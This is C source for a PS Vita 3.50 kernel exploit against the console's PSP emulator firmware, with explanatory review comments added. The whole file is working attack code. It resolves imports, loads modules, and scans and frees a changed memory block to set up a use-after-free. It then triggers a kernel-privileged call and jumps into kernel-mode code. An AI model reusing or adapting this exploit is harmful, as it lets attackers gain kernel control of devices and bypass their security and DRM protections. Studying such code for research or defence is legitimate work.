PS Vita 3.50 Kernel Exploit #4
  1. /*
  2.         Custom Emulator Firmware
  3.         Copyright (C) 2012-2015, Total_Noob
  4.  
  5.         This program is free software: you can redistribute it and/or modify
  6.         it under the terms of the GNU General Public License as published by
  7.         the Free Software Foundation, either version 3 of the License, or
  8.         (at your option) any later version.
  9.  
  10.         This program is distributed in the hope that it will be useful,
  11.         but WITHOUT ANY WARRANTY; without even the implied warranty of
  12.         MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  13.         GNU General Public License for more details.
  14.  
  15.         You should have received a copy of the GNU General Public License
  16.         along with this program.  If not, see <http://www.gnu.org/licenses/>.
  17. */
  18.  
  19. #include <common.h>
  20.  
  21. #include "main.h"
  22. #include "libc.h"
  23. #include "utils.h"
  24.  
/* Upper bound on the number of memory-block addresses recorded by one UID scan. */
#define MAX_UIDS 20

/* Snapshot of live memory-block addresses taken by the first UID scan in doExploit();
 * the second scan compares against it to find a block that appeared or moved. */
u32 address_list[MAX_UIDS];

/* Resolved at runtime by doExploit() via FindImport(); zero (NULL) until then,
 * so load_thread() must not run before doExploit() has filled them in. */
int (* _sceKernelExitDeleteThread)(int status);
int (* _sceUtility_private_7EBD6208)();
  31.  
/*
 * Placeholder with an empty body: as written, calling it has no effect.
 * NOTE(review): the name suggests a post-exploit sysmem repair step; nothing
 * is implemented here, so any caller relying on a repair gets none.
 */
void RepairSysmem()
{
}
  35.  
/*
 * Thread entry point: fires the sceUtility_private_7EBD6208 trigger and then
 * exits and deletes the calling thread.
 *
 * Both function pointers are globals filled in by doExploit() via FindImport();
 * they are not re-checked here, so this must only run after that resolution.
 * Returns whatever sceKernelExitDeleteThread reports (it normally does not
 * return to the caller at all).
 */
int load_thread()
{
        int exit_status;

        /* Trigger first, then tear down this thread with status 0. */
        _sceUtility_private_7EBD6208();
        exit_status = _sceKernelExitDeleteThread(0);

        return exit_status;
}
  41.  
/*
 * Run the kernel exploit chain from user mode.
 *
 * Sequence, in order:
 *   1. Resolve every needed import by NID at runtime (FindImport) and call
 *      ErrorFlashScreen() if any lookup came back NULL.
 *   2. Load the NP_DRM module, allocate a 1-byte memory block to learn where
 *      the current UID range sits, and snapshot the addresses of live memory
 *      blocks in a 2 MiB UID window into address_list.
 *   3. Load the AV_G729 module and rescan the same window; the first UID whose
 *      block address differs from the snapshot is freed (presumably a block the
 *      freshly loaded module now relies on — confirm).
 *   4. Call sceUtility_private_7EBD6208, write back the data cache, and call
 *      sceG729EncodeTermResource, which per the original comment is expected to
 *      run with kernel privilege.
 *   5. Adjust $sp/$s0 with inline asm and jump to kernel_function through an
 *      address with bit 31 set.
 *
 * No parameters, no return value.
 *
 * NOTE(review): ErrorFlashScreen() is assumed never to return. If it does,
 * execution continues and the NULL function pointers are called a few lines
 * later.
 * NOTE(review): the return values of _sceUtilityLoadModule,
 * _sceKernelAllocMemoryBlock and _sceKernelGetMemoryBlockAddr are never
 * checked, and the block behind new_uid is never freed.
 */
void doExploit()
{
        /* Find imports in RAM (FindImport returns NULL for an unresolved NID). */
        void (* _sceKernelDcacheWritebackAll)() = (void *)FindImport("UtilsForUser", 0x79D1C3FA);
        int (* _sceUtilityLoadModule)(int id) = (void *)FindImport("sceUtility", 0x2A2B3DE0);

        SceUID (* _sceKernelCreateThread)(const char *name, SceKernelThreadEntry entry, int initPriority, int stackSize, SceUInt attr, SceKernelThreadOptParam *option) = (void *)FindImport("ThreadManForUser", 0x446D8DE6);
        int (* _sceKernelStartThread)(SceUID thid, SceSize arglen, void *argp) = (void *)FindImport("ThreadManForUser", 0xF475845D);
        int (* _sceKernelWaitThreadEnd)(SceUID thid, SceUInt *timeout) = (void *)FindImport("ThreadManForUser", 0x278C0DF5);

        /* These two are globals so load_thread() can reach them. */
        _sceKernelExitDeleteThread = (void *)FindImport("ThreadManForUser", 0x809CE29B);
        _sceUtility_private_7EBD6208 = (void *)FindImport("sceUtility_private", 0x7EBD6208);

        SceUID (* _sceKernelAllocMemoryBlock)(const char *name, int type, u32 size, void *params) = (void *)FindImport("SysMemUserForUser", 0xFE707FDF);
        int (* _sceKernelGetMemoryBlockAddr)(SceUID uid, void **ptr) = (void *)FindImport("SysMemUserForUser", 0xDB83A952);
        int (* _sceKernelFreeMemoryBlock)(SceUID uid) = (void *)FindImport("SysMemUserForUser", 0x50F61D8A);

        /* Every import must have resolved; ErrorFlashScreen() is expected not to return. */
        if(!_sceKernelDcacheWritebackAll || !_sceUtilityLoadModule) ErrorFlashScreen();
        if(!_sceKernelCreateThread || !_sceKernelStartThread || !_sceKernelWaitThreadEnd) ErrorFlashScreen();
        if(!_sceKernelExitDeleteThread || !_sceUtility_private_7EBD6208) ErrorFlashScreen();
        if(!_sceKernelAllocMemoryBlock || !_sceKernelGetMemoryBlockAddr || !_sceKernelFreeMemoryBlock) ErrorFlashScreen();

        /* Load required module (return value not checked). */
        _sceUtilityLoadModule(PSP_MODULE_NP_DRM);

        /* Allocate a throwaway 1-byte block only to learn the current UID range.
         * NOTE(review): a negative (error) return is not detected, and the block
         * is never freed. */
        SceUID new_uid = _sceKernelAllocMemoryBlock("", PSP_SMEM_High, 1, NULL);

        /* Scan window: from the top of the 1 MiB UID bucket above new_uid's,
         * down 2 MiB. The scans step by 2, which assumes UIDs share the parity
         * of uid_max — confirm against the UID allocator. */
        SceUID uid_max = ((new_uid & 0xFFF00000) | 0x000FFFFF) + 0x100000;
        SceUID uid_min = uid_max - 0x200000;

        int i;
        SceUID uid;

        /* First scan: record the address of every live block in the window.
         * addr starts at 0 and is only taken as a hit when bit 31 is set, so a
         * lookup that does not write addr is skipped. The snapshot is capped at
         * MAX_UIDS entries. */
        for(uid = uid_max, i = 0; uid > uid_min && i < MAX_UIDS; uid -= 2)
        {
                u32 addr = 0;
                _sceKernelGetMemoryBlockAddr(uid, (void *)&addr);

                if(addr & 0x80000000)
                {
                        address_list[i] = addr;
                        i++;
                }
        }

        /* Load first module (return value not checked). */
        _sceUtilityLoadModule(PSP_MODULE_AV_G729);

        int (* _sceG729EncodeTermResource)() = (void *)FindImport("sceG729", 0x94714D50);
        if(!_sceG729EncodeTermResource) ErrorFlashScreen();

        int free = 0;

        /* Second scan over the same window after loading sceG729. i walks the
         * snapshot in lock-step with the hits, so the first live block whose
         * address differs from the snapshot (appeared or moved) is freed and the
         * scan stops. NOTE(review): if the first scan recorded fewer entries than
         * this scan finds, address_list[i] reads a zero from BSS, which also
         * counts as a mismatch. */
        for(uid = uid_max, i = 0; uid > uid_min && i < MAX_UIDS; uid -= 2)
        {
                u32 addr = 0;
                _sceKernelGetMemoryBlockAddr(uid, (void *)&addr);

                if(addr & 0x80000000)
                {
                        if(address_list[i] != addr)
                        {
                                _sceKernelFreeMemoryBlock(uid);
                                free = 1;
                                break;
                        }

                        i++;
                }
        }

        /* No candidate block was found; the chain cannot continue. */
        if(!free) ErrorFlashScreen();

        /* Load second module.
         * Disabled alternative kept for reference: run the trigger from a helper
         * thread (load_thread) instead of calling it inline below. */
/*      SceUID thid = _sceKernelCreateThread("load_thread", load_thread, 0x10, 0x1000, 0, NULL);
        _sceKernelStartThread(thid, 0, NULL);
        _sceKernelWaitThreadEnd(thid, NULL);*/
        _sceUtility_private_7EBD6208();

        /* Write back the data cache before the privileged call — presumably so
         * pending writes are visible to the code that runs next; confirm. */
        _sceKernelDcacheWritebackAll();

        /* Execute with kernel privilege (per the original author's comment). */
        _sceG729EncodeTermResource();

        /* Restore registers.
         * NOTE(review): two basic asm statements with no operands and no clobber
         * list, so the compiler is not told that $sp and $s0 change here. This
         * only works if GCC emits exactly the expected frame around this point.
         * What the instructions actually do is move $sp down by 16 bytes and
         * copy $k1 into $s0. */
        asm("addiu $sp, $sp, -16\n");
        asm("move $s0, $k1\n");

        /* Execute kernel function: jump to kernel_function (defined elsewhere)
         * through its address with bit 31 set — presumably the kernel-space
         * mirror of the same code; confirm against the memory map. */
        void (* execute)() = (void *)((u32)kernel_function | 0x80000000);
        execute();
}